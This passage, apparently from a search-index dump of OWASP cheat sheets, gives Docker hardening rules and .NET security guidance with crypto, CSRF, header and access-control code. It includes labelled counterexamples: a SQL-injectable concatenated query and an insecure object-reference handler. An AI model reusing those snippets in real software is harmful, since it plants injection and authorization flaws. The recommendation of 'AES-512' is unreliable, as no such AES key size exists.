"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-5-disable-inter-container-communication-iccfalse","title":"RULE #5 - Disable inter-container communication (--icc=false)","text":"

By default inter-container communication (icc) is enabled - it means that all containers can talk with each other (using docker0 bridged network). This can be disabled by running docker daemon with --icc=false flag. If icc is disabled (icc=false) it is required to tell which containers can communicate using --link=CONTAINER_NAME_or_ID:ALIAS option. See more in Docker documentation - container communication

In Kubernetes Network Policies can be used for it.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-6-use-linux-security-module-seccomp-apparmor-or-selinux","title":"RULE #6 - Use Linux Security Module (seccomp, AppArmor, or SELinux)","text":"

First of all, do not disable default security profile!

Consider using security profile like seccomp or AppArmor.

Instructions how to do this inside Kubernetes can be found at Security Context documentation and in Kubernetes API documentation

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-7-limit-resources-memory-cpu-file-descriptors-processes-restarts","title":"RULE #7 - Limit resources (memory, CPU, file descriptors, processes, restarts)","text":"

The best way to avoid DoS attacks is by limiting resources. You can limit memory, CPU, maximum number of restarts (--restart=on-failure:<number_of_restarts>), maximum number of file descriptors (--ulimit nofile=<number>) and maximum number of processes (--ulimit nproc=<number>).

Check documentation for more details about ulimits

You can also do this inside Kubernetes: Assign Memory Resources to Containers and Pods, Assign CPU Resources to Containers and Pods and Assign Extended Resources to a Container

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-8-set-filesystem-and-volumes-to-read-only","title":"RULE #8 - Set filesystem and volumes to read-only","text":"

Run containers with a read-only filesystem using --read-only flag. For example:

docker run --read-only alpine sh -c 'echo \"whatever\" > /tmp'\n

If an application inside a container has to save something temporarily, combine --read-only flag with --tmpfs like this:

docker run --read-only --tmpfs /tmp alpine sh -c 'echo \"whatever\" > /tmp/file'\n

Equivalent in the docker-compose file will be:

version: \"3\"\nservices:\nalpine:\nimage: alpine\nread_only: true\n

Equivalent in kubernetes in Security Context will be:

kind: ...\napiVersion: ...\nmetadata:\nname: ...\nspec:\n...\ncontainers:\n- name: ...\nimage: ....\nsecurityContext:\n...\nreadOnlyRootFilesystem: true\n...\n

In addition, if the volume is mounted only for reading mount them as a read-only It can be done by appending :ro to the -v like this:

docker run -v volume-name:/path/in/container:ro alpine\n

Or by using --mount option:

docker run --mount source=volume-name,destination=/path/in/container,readonly alpine\n
"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-9-use-static-analysis-tools","title":"RULE #9 - Use static analysis tools","text":"

To detect containers with known vulnerabilities - scan images using static analysis tools.

To detect secrets in images:

To detect misconfigurations in Kubernetes:

To detect misconfigurations in Docker:

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-10-set-the-logging-level-to-at-least-info","title":"RULE #10 - Set the logging level to at least INFO","text":"

By default, the Docker daemon is configured to have a base logging level of 'info', and if this is not the case: set the Docker daemon log level to 'info'. Rationale: Setting up an appropriate log level, configures the Docker daemon to log events that you would want to review later. A base log level of 'info' and above would capture all logs except the debug logs. Until and unless required, you should not run docker daemon at the 'debug' log level.

To configure the log level in docker-compose:

docker-compose --log-level info up\n
"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-11-lint-the-dockerfile-at-build-time","title":"Rule #11 - Lint the Dockerfile at build time","text":"

Many issues can be prevented by following some best practices when writing the Dockerfile. Adding a security linter as a step in the build pipeline can go a long way in avoiding further headaches. Some issues that are worth checking are:

References:

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-12-run-docker-in-root-less-mode","title":"Rule #12 - Run Docker in root-less mode","text":"

Rootless mode ensures that the Docker daemon and containers are running as an unprivileged user, which means that even if an attacker breaks out of the container, they will not have root privileges on the host, which in turn substantially limits the attack surface.

Rootless mode graduated from experimental in Docker Engine v20.10 and should be considered for added security, provided the known limitations are not an impediment.

Rootless mode allows running the Docker daemon and containers as a non-root user to mitigate potential vulnerabilities in the daemon and the container runtime. Rootless mode does not require root privileges even during the installation of the Docker daemon, as long as the prerequisites are met. Rootless mode was introduced in Docker Engine v19.03 as an experimental feature. Rootless mode graduated from experimental in Docker Engine v20.10.

Read more about rootless mode and its limitations, installation and usage instructions on Docker documentation page.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#related-projects","title":"Related Projects","text":"

OWASP Docker Top 10

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html","title":"DotNet Security Cheat Sheet","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This page intends to provide quick basic .NET security tips for developers.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#the-net-framework","title":"The .NET Framework","text":"

The .NET Framework is Microsoft's principal platform for enterprise development. It is the supporting API for ASP.NET, Windows Desktop applications, Windows Communication Foundation services, SharePoint, Visual Studio Tools for Office and other technologies.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#updating-the-framework","title":"Updating the Framework","text":"

The .NET Framework is kept up-to-date by Microsoft with the Windows Update service. Developers do not normally need to run separate updates to the Framework. Windows Update can be accessed at Windows Update or from the Windows Update program on a Windows computer.

Individual frameworks can be kept up to date using NuGet. As Visual Studio prompts for updates, build it into your lifecycle.

Remember that third-party libraries have to be updated separately and not all of them use NuGet. ELMAH for instance, requires a separate update effort.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#security-announcements","title":"Security Announcements","text":"

Receive security notifications by selecting the \"Watch\" button at the following repositories:

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#net-framework-guidance","title":".NET Framework Guidance","text":"

The .NET Framework is the set of APIs that support an advanced type system, data, graphics, network, file handling and most of the rest of what is needed to write enterprise apps in the Microsoft ecosystem. It is a nearly ubiquitous library that is strongly named and versioned at the assembly level.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#data-access","title":"Data Access","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#cryptography","title":"Cryptography","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#general-cryptography-guidance","title":"General cryptography guidance","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#encryption-for-storage","title":"Encryption for storage","text":"

The following code snippet shows an example of using AES-GCM to perform encryption/decryption of data. It is strongly recommended to have a cryptography expert review your final design and code, as even the most trivial error can severely weaken your encryption.

The code is based on example from here: https://www.scottbrady91.com/c-sharp/aes-gcm-dotnet

A few constraints/pitfalls with this code:

Click here to view the \"AES-GCM symmetric encryption\" code snippet.
// Code based on example from here:\n// https://www.scottbrady91.com/c-sharp/aes-gcm-dotnet\n\npublic class AesGcmSimpleTest\n{\npublic static void Main()\n{\n\n// Key of 32 bytes / 256 bits for AES\nvar key = new byte[32];\nRandomNumberGenerator.Fill(key);\n\n// MaxSize = 12 bytes / 96 bits and this size should always be used.\nvar nonce = new byte[AesGcm.NonceByteSizes.MaxSize];\nRandomNumberGenerator.Fill(nonce);\n\n// Tag for authenticated encryption\nvar tag = new byte[AesGcm.TagByteSizes.MaxSize];\n\nvar message = \"This message to be encrypted\";\nConsole.WriteLine(message);\n\n// Encrypt the message\nvar cipherText = AesGcmSimple.Encrypt(message, nonce, out tag, key);\nConsole.WriteLine(Convert.ToBase64String(cipherText));\n\n// Decrypt the message\nvar message2 = AesGcmSimple.Decrypt(cipherText, nonce, tag, key);\nConsole.WriteLine(message2);\n\n\n}\n}\n\n\npublic static class AesGcmSimple\n{\n\npublic static byte[] Encrypt(string plaintext, byte[] nonce, out byte[] tag, byte[] key)\n{\nusing(var aes = new AesGcm(key))\n{\n// Tag for authenticated encryption\ntag = new byte[AesGcm.TagByteSizes.MaxSize];\n\n// Create a byte array from the message to encrypt\nvar plaintextBytes = Encoding.UTF8.GetBytes(plaintext);\n\n// Ciphertext will be same length in bytes as plaintext \nvar ciphertext = new byte[plaintextBytes.Length];\n\n// perform the actual encryption\naes.Encrypt(nonce, plaintextBytes, ciphertext, tag);\nreturn ciphertext;\n}\n}\n\npublic static string Decrypt(byte[] ciphertext, byte[] nonce, byte[] tag, byte[] key)\n{\nusing(var aes = new AesGcm(key))\n{\n// Plaintext will be same length in bytes as Ciphertext \nvar plaintextBytes = new byte[ciphertext.Length];\n\n// perform the actual decryption\naes.Decrypt(nonce, ciphertext, tag, plaintextBytes);\n\nreturn Encoding.UTF8.GetString(plaintextBytes);\n}\n}\n}\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#encryption-for-transmission","title":"Encryption for transmission","text":"

The following code snippet shows an example of using Eliptic Curve/Diffie Helman (ECDH) together with AES-GCM to perform encryption/decryption of data between two different sides without the need the transfer the symmetric key between the two sides. Instead, the sides exchange public keys and can then use ECDH to generate a shared secret which can be used for the symmetric encryption.

Again, it is strongly recommended to have a cryptography expert review your final design and code, as even the most trivial error can severely weaken your encryption.

Note that this code sample relies on the AesGcmSimple class from the previous section.

A few constraints/pitfalls with this code:

Click here to view the \"ECDH asymmetric encryption\" code snippet.
public class ECDHSimpleTest\n{\npublic static void Main()\n{\n// Generate ECC key pair for Alice\nvar alice = new ECDHSimple();\nbyte[] alicePublicKey = alice.PublicKey;\n\n// Generate ECC key pair for Bob\nvar bob = new ECDHSimple();\nbyte[] bobPublicKey = bob.PublicKey;\n\nstring plaintext = \"Hello, Bob! How are you?\";\nConsole.WriteLine(\"Secret being sent from Alice to Bob: \" + plaintext);\n\n// Note that a new nonce is generated with every encryption operation in line with\n// in line with the AES GCM security \nbyte[] tag;\nbyte[] nonce;\nvar cipherText = alice.Encrypt(bobPublicKey, plaintext, out nonce, out tag);\nConsole.WriteLine(\"Ciphertext, nonce, and tag being sent from Alice to Bob: \" + Convert.ToBase64String(cipherText) + \" \" + Convert.ToBase64String(nonce) + \" \" + Convert.ToBase64String(tag));\n\nvar decrypted = bob.Decrypt(alicePublicKey, cipherText, nonce, tag);\nConsole.WriteLine(\"Secret received by Bob from Alice: \" + decrypted);\n\nConsole.WriteLine();\n\nstring plaintext2 = \"Hello, Alice! I'm good, how are you?\";\nConsole.WriteLine(\"Secret being sent from Bob to Alice: \" + plaintext2);\n\nbyte[] tag2;\nbyte[] nonce2;\nvar cipherText2 = bob.Encrypt(alicePublicKey, plaintext2, out nonce2, out tag2);\nConsole.WriteLine(\"Ciphertext, nonce, and tag being sent from Bob to Alice: \" + Convert.ToBase64String(cipherText2) + \" \" + Convert.ToBase64String(nonce2) + \" \" + Convert.ToBase64String(tag2));\n\nvar decrypted2 = alice.Decrypt(bobPublicKey, cipherText2, nonce2, tag2);\nConsole.WriteLine(\"Secret received by Alice from Bob: \" + decrypted2);\n}\n}\n\n\npublic class ECDHSimple\n{\n\nprivate ECDiffieHellmanCng ecdh = new ECDiffieHellmanCng();\n\npublic byte[] PublicKey\n{\nget\n{\nreturn ecdh.PublicKey.ToByteArray();\n}\n}\n\npublic byte[] Encrypt(byte[] partnerPublicKey, string message, out byte[] nonce, out byte[] tag)\n{\n// Generate the AES Key and Nonce\nvar aesKey = GenerateAESKey(partnerPublicKey);\n\n// Tag for authenticated encryption\ntag = new byte[AesGcm.TagByteSizes.MaxSize];\n\n// MaxSize = 12 bytes / 96 bits and this size should always be used.\n// A new nonce is generated with every encryption operation in line with\n// the AES GCM security model\nnonce = new byte[AesGcm.NonceByteSizes.MaxSize];\nRandomNumberGenerator.Fill(nonce);\n\n// return the encrypted value\nreturn AesGcmSimple.Encrypt(message, nonce, out tag, aesKey);\n}\n\n\npublic string Decrypt(byte[] partnerPublicKey, byte[] ciphertext, byte[] nonce, byte[] tag)\n{\n// Generate the AES Key and Nonce\nvar aesKey = GenerateAESKey(partnerPublicKey);\n\n// return the decrypted value\nreturn AesGcmSimple.Decrypt(ciphertext, nonce, tag, aesKey);\n}\n\nprivate byte[] GenerateAESKey(byte[] partnerPublicKey)\n{\n// Derive the secret based on this side's private key and the other side's public key \nbyte[] secret = ecdh.DeriveKeyMaterial(CngKey.Import(partnerPublicKey, CngKeyBlobFormat.EccPublicBlob));\n\nbyte[] aesKey = new byte[32]; // 256-bit AES key\nArray.Copy(secret, 0, aesKey, 0, 32); // Copy first 32 bytes as the key\n\nreturn aesKey;\n}\n}\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#hashing","title":"Hashing","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#general","title":"General","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-web-forms-guidance","title":"ASP NET Web Forms Guidance","text":"

ASP.NET Web Forms is the original browser-based application development API for the .NET framework, and is still the most common enterprise platform for web application development.

protected\u00a0override\u00a0OnInit(EventArgs\u00a0e)\u00a0{\nbase.OnInit(e);\nViewStateUserKey\u00a0=\u00a0Session.SessionID;\n}\n

If you don't use Viewstate, then look to the default master page of the ASP.NET Web Forms default template for a manual anti-CSRF token using a double-submit cookie.

private\u00a0const\u00a0string\u00a0AntiXsrfTokenKey\u00a0=\u00a0\"__AntiXsrfToken\";\nprivate\u00a0const\u00a0string\u00a0AntiXsrfUserNameKey\u00a0=\u00a0\"__AntiXsrfUserName\";\nprivate\u00a0string\u00a0_antiXsrfTokenValue;\nprotected\u00a0void\u00a0Page_Init(object\u00a0sender,\u00a0EventArgs\u00a0e)\n{\n//\u00a0The\u00a0code\u00a0below\u00a0helps\u00a0to\u00a0protect\u00a0against\u00a0XSRF\u00a0attacks\nvar\u00a0requestCookie\u00a0=\u00a0Request.Cookies[AntiXsrfTokenKey];\nGuid\u00a0requestCookieGuidValue;\nif\u00a0(requestCookie\u00a0!=\u00a0null\u00a0&&\u00a0Guid.TryParse(requestCookie.Value,\u00a0out\u00a0requestCookieGuidValue))\n{\n//\u00a0Use\u00a0the\u00a0Anti-XSRF\u00a0token\u00a0from\u00a0the\u00a0cookie\n_antiXsrfTokenValue\u00a0=\u00a0requestCookie.Value;\nPage.ViewStateUserKey\u00a0=\u00a0_antiXsrfTokenValue;\n}\nelse\n{\n//\u00a0Generate\u00a0a\u00a0new\u00a0Anti-XSRF\u00a0token\u00a0and\u00a0save\u00a0to\u00a0the\u00a0cookie\n_antiXsrfTokenValue\u00a0=\u00a0Guid.NewGuid().ToString(\"N\");\nPage.ViewStateUserKey\u00a0=\u00a0_antiXsrfTokenValue;\nvar\u00a0responseCookie\u00a0=\u00a0new\u00a0HttpCookie(AntiXsrfTokenKey)\n{\nHttpOnly\u00a0=\u00a0true,\nValue\u00a0=\u00a0_antiXsrfTokenValue\n};\nif\u00a0(FormsAuthentication.RequireSSL\u00a0&&\u00a0Request.IsSecureConnection)\n{\nresponseCookie.Secure\u00a0=\u00a0true;\n}\nResponse.Cookies.Set(responseCookie);\n}\nPage.PreLoad\u00a0+=\u00a0master_Page_PreLoad;\n}\nprotected\u00a0void\u00a0master_Page_PreLoad(object\u00a0sender,\u00a0EventArgs\u00a0e)\n{\nif\u00a0(!IsPostBack)\n{\n//\u00a0Set\u00a0Anti-XSRF\u00a0token\nViewState[AntiXsrfTokenKey]\u00a0=\u00a0Page.ViewStateUserKey;\nViewState[AntiXsrfUserNameKey]\u00a0=\u00a0Context.User.Identity.Name\u00a0??\u00a0String.Empty;\n}\nelse\n{\n//\u00a0Validate\u00a0the\u00a0Anti-XSRF\u00a0token\nif ((string)ViewState[AntiXsrfTokenKey] != _antiXsrfTokenValue ||\n(string)ViewState[AntiXsrfUserNameKey]\u00a0!=\u00a0(Context.User.Identity.Name\u00a0??\u00a0String.Empty))\n{\nthrow\u00a0new\u00a0InvalidOperationException(\"Validation\u00a0of\u00a0Anti-XSRF\u00a0token\u00a0failed.\");\n}\n}\n}\n
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<configuration>\n<system.web>\n<httpRuntime enableVersionHeader=\"false\"/>\n</system.web>\n<system.webServer>\n<security>\n<requestFiltering removeServerHeader=\"true\" />\n</security>\n<staticContent>\n<clientCache cacheControlCustom=\"public\"\ncacheControlMode=\"UseMaxAge\"\ncacheControlMaxAge=\"1.00:00:00\"\nsetEtag=\"true\" />\n</staticContent>\n<httpProtocol>\n<customHeaders>\n<add name=\"Content-Security-Policy\"\nvalue=\"default-src 'none'; style-src 'self'; img-src 'self'; font-src 'self'\" />\n<add name=\"X-Content-Type-Options\" value=\"NOSNIFF\" />\n<add name=\"X-Frame-Options\" value=\"DENY\" />\n<add name=\"X-Permitted-Cross-Domain-Policies\" value=\"master-only\"/>\n<add name=\"X-XSS-Protection\" value=\"0\"/>\n<remove name=\"X-Powered-By\"/>\n</customHeaders>\n</httpProtocol>\n<rewrite>\n<rules>\n<rule name=\"Redirect to https\">\n<match url=\"(.*)\"/>\n<conditions>\n<add input=\"{HTTPS}\" pattern=\"Off\"/>\n<add input=\"{REQUEST_METHOD}\" pattern=\"^get$|^head$\" />\n</conditions>\n<action type=\"Redirect\" url=\"https://{HTTP_HOST}/{R:1}\" redirectType=\"Permanent\"/>\n</rule>\n</rules>\n<outboundRules>\n<rule name=\"Add HSTS Header\" enabled=\"true\">\n<match serverVariable=\"RESPONSE_Strict_Transport_Security\" pattern=\".*\" />\n<conditions>\n<add input=\"{HTTPS}\" pattern=\"on\" ignoreCase=\"true\" />\n</conditions>\n<action type=\"Rewrite\" value=\"max-age=15768000\" />\n</rule>\n</outboundRules>\n</rewrite>\n</system.webServer>\n</configuration>\n
<httpRuntime enableVersionHeader=\"false\" />\n
HttpContext.Current.Response.Headers.Remove(\"Server\");\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#http-validation-and-encoding","title":"HTTP validation and encoding","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#forms-authentication","title":"Forms authentication","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-mvc-guidance","title":"ASP NET MVC Guidance","text":"

ASP.NET MVC (Model\u2013View\u2013Controller) is a contemporary web application framework that uses more standardized HTTP communication than the Web Forms postback model.

The OWASP Top 10 2017 lists the most prevalent and dangerous threats to web security in the world today and is reviewed every 3 years.

This section is based on this. Your approach to securing your web application should be to start at the top threat A1 below and work down, this will ensure that any time spent on security will be spent most effectively spent and cover the top threats first and lesser threats afterwards. After covering the top 10 it is generally advisable to assess for other threats or get a professionally completed Penetration Test.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a1-injection","title":"A1 Injection","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

DO: Using an object relational mapper (ORM) or stored procedures is the most effective way of countering the SQL Injection vulnerability.

DO: Use parameterized queries where a direct sql query must be used. More Information can be found here.

e.g. In entity frameworks:

var\u00a0sql\u00a0=\u00a0@\"Update\u00a0[User]\u00a0SET\u00a0FirstName\u00a0=\u00a0@FirstName\u00a0WHERE\u00a0Id\u00a0=\u00a0@Id\";\ncontext.Database.ExecuteSqlCommand(\nsql,\nnew\u00a0SqlParameter(\"@FirstName\",\u00a0firstname),\nnew\u00a0SqlParameter(\"@Id\",\u00a0id));\n

DO NOT: Concatenate strings anywhere in your code and execute them against your database (Known as dynamic sql).

NB: You can still accidentally do this with ORMs or Stored procedures so check everywhere.

e.g

string\u00a0strQry\u00a0=\u00a0\"SELECT\u00a0*\u00a0FROM\u00a0Users\u00a0WHERE\u00a0UserName='\"\u00a0+\u00a0txtUser.Text\u00a0+\u00a0\"'\u00a0AND\u00a0Password='\"\n+\u00a0txtPassword.Text\u00a0+\u00a0\"'\";\nEXEC\u00a0strQry\u00a0//\u00a0SQL\u00a0Injection\u00a0vulnerability!\n

DO: Practice Least Privilege - Connect to the database using an account with a minimum set of permissions required to do it's job i.e. not the sa account

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#os-injection","title":"OS Injection","text":"

General guidance about OS Injection can be found on this cheat sheet.

DO: Use System.Diagnostics.Process.Start to call underlying OS functions.

e.g

var process = new System.Diagnostics.Process();\nvar startInfo = new System.Diagnostics.ProcessStartInfo();\nstartInfo.FileName = \"validatedCommand\";\nstartInfo.Arguments = \"validatedArg1 validatedArg2 validatedArg3\";\nprocess.StartInfo = startInfo;\nprocess.Start();\n

DO NOT: Assume that this mechanism will protect against malicious input designed to break out of one argument and then tamper with another argument to the process. This will still be possible.

DO: Use allow-list validation on all user supplied input wherever possible. Input validation prevents improperly formed data from entering an information system. For more information please see the Input Validation Cheat Sheet.

e.g Validating user input using IPAddress.TryParse Method

//User input\nstring ipAddress = \"127.0.0.1\";\n\n//check to make sure an ip address was provided\nif (!string.IsNullOrEmpty(ipAddress))\n{\n// Create an instance of IPAddress for the specified address string (in\n// dotted-quad, or colon-hexadecimal notation).\nif (IPAddress.TryParse(ipAddress, out var address))\n{\n// Display the address in standard notation.\nreturn address.ToString();\n}\nelse\n{\n//ipAddress is not of type IPAddress\n...\n}\n...\n}\n

DO: Try to only accept characters which are simple alphanumeric.

DO NOT: Assume you can sanitize special characters without actually removing them. Various combinations of \\, ' and @ may have an unexpected impact on sanitization attempts.

DO NOT: Rely on methods without a security guarantee.

e.g. .NET Core 2.2 and greater and .NET 5 and greater support ProcessStartInfo.ArgumentList which performs some character escaping but the object includes a disclaimer that it is not safe with untrusted input.

DO: Look at alternatives to passing raw untrusted arguments via command-line parameters such as encoding using Base64 (which would safely encode any special characters as well) and then decode the parameters in the receiving application.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#ldap-injection","title":"LDAP injection","text":"

Almost any characters can be used in Distinguished Names. However, some must be escaped with the backslash \\ escape character. A table showing which characters that should be escaped for Active Directory can be found at the in the LDAP Injection Prevention Cheat Sheet.

NB: The space character must be escaped only if it is the leading or trailing character in a component name, such as a Common Name. Embedded spaces should not be escaped.

More information can be found here.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a2-broken-authentication","title":"A2 Broken Authentication","text":"

DO: Use ASP.net Core Identity. ASP.net Core Identity framework is well configured by default, where it uses secure password hashes and an individual salt. Identity uses the PBKDF2 hashing function for passwords, and they generate a random salt per user.

DO: Set secure password policy

e.g ASP.net Core Identity

//startup.cs\nservices.Configure<IdentityOptions>(options =>\n{\n// Password settings\noptions.Password.RequireDigit = true;\noptions.Password.RequiredLength = 8;\noptions.Password.RequireNonAlphanumeric = true;\noptions.Password.RequireUppercase = true;\noptions.Password.RequireLowercase = true;\noptions.Password.RequiredUniqueChars = 6;\n\n\noptions.Lockout.DefaultLockoutTimeSpan = TimeSpan.FromMinutes(30);\noptions.Lockout.MaxFailedAccessAttempts = 3;\n\noptions.SignIn.RequireConfirmedEmail = true;\n\noptions.User.RequireUniqueEmail = true;\n});\n

DO: Set a cookie policy

e.g

//startup.cs\nservices.ConfigureApplicationCookie(options =>\n{\noptions.Cookie.HttpOnly = true;\noptions.Cookie.Expiration = TimeSpan.FromHours(1)\noptions.SlidingExpiration = true;\n});\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a3-sensitive-data-exposure","title":"A3 Sensitive Data Exposure","text":"

DO NOT: Store encrypted passwords.

DO: Use a strong hash to store password credentials. For hash refer to this section.

DO: Enforce passwords with a minimum complexity that will survive a dictionary attack i.e. longer passwords that use the full character set (numbers, symbols and letters) to increase the entropy.

DO: Use a strong encryption routine such as AES-512 where personally identifiable data needs to be restored to it's original format. Protect encryption keys more than any other asset, please find more information of storing encryption keys at rest. Apply the following test: Would you be happy leaving the data on a spreadsheet on a bus for everyone to read. Assume the attacker can get direct access to your database and protect it accordingly. More information can be found here.

DO: Use TLS 1.2 for your entire site. Get a free certificate LetsEncrypt.org.

DO NOT: Allow SSL, this is now obsolete.

DO: Have a strong TLS policy (see SSL Best Practices), use TLS 1.2 wherever possible. Then check the configuration using SSL Test or TestSSL.

DO: Ensure headers are not disclosing information about your application. See HttpHeaders.cs , Dionach StripHeaders, disable via web.config or startup.cs:

More information on Transport Layer Protection can be found here. e.g Web.config

<system.web>\n<httpRuntime enableVersionHeader=\"false\"/>\n</system.web>\n<system.webServer>\n<security>\n<requestFiltering removeServerHeader=\"true\" />\n</security>\n<httpProtocol>\n<customHeaders>\n<add name=\"X-Content-Type-Options\" value=\"nosniff\" />\n<add name=\"X-Frame-Options\" value=\"DENY\" />\n<add name=\"X-Permitted-Cross-Domain-Policies\" value=\"master-only\"/>\n<add name=\"X-XSS-Protection\" value=\"0\"/>\n<remove name=\"X-Powered-By\"/>\n</customHeaders>\n</httpProtocol>\n</system.webServer>\n

e.g Startup.cs

app.UseHsts(hsts => hsts.MaxAge(365).IncludeSubdomains());\napp.UseXContentTypeOptions();\napp.UseReferrerPolicy(opts => opts.NoReferrer());\napp.UseXXssProtection(options => options.FilterDisabled());\napp.UseXfo(options => options.Deny());\n\napp.UseCsp(opts => opts\n.BlockAllMixedContent()\n.StyleSources(s => s.Self())\n.StyleSources(s => s.UnsafeInline())\n.FontSources(s => s.Self())\n.FormActions(s => s.Self())\n.FrameAncestors(s => s.Self())\n.ImageSources(s => s.Self())\n.ScriptSources(s => s.Self())\n);\n

For more information about headers can be found here.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a4-xml-external-entities-xxe","title":"A4 XML External Entities (XXE)","text":"

XXE attacks occur when an XML parse does not properly process user input that contains external entity declaration in the doctype of an XML payload.

This article discusses the most common XML Processing Options for .NET.

Please refer to the XXE cheat sheet for more detailed information on preventing XXE and other XML Denial of Service attacks.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a5-broken-access-control","title":"A5 Broken Access Control","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#weak-account-management","title":"Weak Account management","text":"

Ensure cookies are sent via httpOnly:

CookieHttpOnly\u00a0=\u00a0true,\n

Reduce the time period a session can be stolen in by reducing session timeout and removing sliding expiration:

ExpireTimeSpan\u00a0=\u00a0TimeSpan.FromMinutes(60),\nSlidingExpiration\u00a0=\u00a0false\n

See here for full startup code snippet

Ensure cookie is sent over HTTPS in the production environment. This should be enforced in the config transforms:

<httpCookies requireSSL=\"true\" xdt:Transform=\"SetAttributes(requireSSL)\"/>\n<authentication>\n<forms requireSSL=\"true\" xdt:Transform=\"SetAttributes(requireSSL)\"/>\n</authentication>\n

Protect LogOn, Registration and password reset methods against brute force attacks by throttling requests (see code below), consider also using ReCaptcha.

[HttpPost]\n[AllowAnonymous]\n[ValidateAntiForgeryToken]\n[AllowXRequestsEveryXSecondsAttribute(Name = \"LogOn\",\nMessage = \"You have performed this action more than {x} times in the last {n} seconds.\",\nRequests = 3, Seconds = 60)]\npublic\u00a0async\u00a0Task<ActionResult>\u00a0LogOn(LogOnViewModel\u00a0model,\u00a0string\u00a0returnUrl)\n

DO NOT: Roll your own authentication or session management, use the one provided by .Net

DO NOT: Tell someone if the account exists on LogOn, Registration or Password reset. Say something like 'Either the username or password was incorrect', or 'If this account exists then a reset token will be sent to the registered email address'. This protects against account enumeration.

The feedback to the user should be identical whether or not the account exists, both in terms of content and behavior: e.g. if the response takes 50% longer when the account is real then membership information can be guessed and tested.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#missing-function-level-access-control","title":"Missing function-level access control","text":"

DO: Authorize users on all externally facing endpoints. The .NET framework has many ways to authorize a user, use them at method level:

[Authorize(Roles\u00a0=\u00a0\"Admin\")]\n[HttpGet]\npublic\u00a0ActionResult\u00a0Index(int\u00a0page\u00a0=\u00a01)\n

or better yet, at controller level:

[Authorize]\npublic\u00a0class\u00a0UserController\n

You can also check roles in code using identity features in .net: System.Web.Security.Roles.IsUserInRole(userName, roleName)

You can find more information here on Access Control and here for Authorization.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#insecure-direct-object-references","title":"Insecure Direct object references","text":"

When you have a resource (object) which can be accessed by a reference (in the sample below this is the id) then you need to ensure that the user is intended to be there

//\u00a0Insecure\npublic\u00a0ActionResult\u00a0Edit(int\u00a0id)\n{\nvar\u00a0user\u00a0=\u00a0_context.Users.FirstOrDefault(e\u00a0=>\u00a0e.Id\u00a0==\u00a0id);\nreturn\u00a0View(\"Details\",\u00a0new\u00a0UserViewModel(user);\n}\n\n//\u00a0Secure\npublic\u00a0ActionResult\u00a0Edit(int\u00a0id)\n{\nvar\u00a0user\u00a0=\u00a0_context.Users.FirstOrDefault(e\u00a0=>\u00a0e.Id\u00a0==\u00a0id);\n//\u00a0Establish\u00a0user\u00a0has\u00a0right\u00a0to\u00a0edit\u00a0the\u00a0details\nif\u00a0(user.Id\u00a0!=\u00a0_userIdentity.GetUserId())\n{\nHandleErrorInfo\u00a0error\u00a0=\u00a0new\u00a0HandleErrorInfo(\nnew\u00a0Exception(\"INFO:\u00a0You\u00a0do\u00a0not\u00a0have\u00a0permission\u00a0to\u00a0edit\u00a0these\u00a0details\"));\nreturn\u00a0View(\"Error\",\u00a0error);\n}\nreturn\u00a0View(\"Edit\",\u00a0new\u00a0UserViewModel(user);\n}\n

More information can be found here for Insecure Direct Object Reference.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a6-security-misconfiguration","title":"A6 Security Misconfiguration","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#debug-and-stack-trace","title":"Debug and Stack Trace","text":"

Ensure debug and trace are off in production. This can be enforced using web.config transforms:

<compilation xdt:Transform=\"RemoveAttributes(debug)\" />\n<trace enabled=\"false\" xdt:Transform=\"Replace\"/>\n

DO NOT: Use default passwords

DO: (When using TLS) Redirect a request made over Http to https:

e.g Global.asax.cs

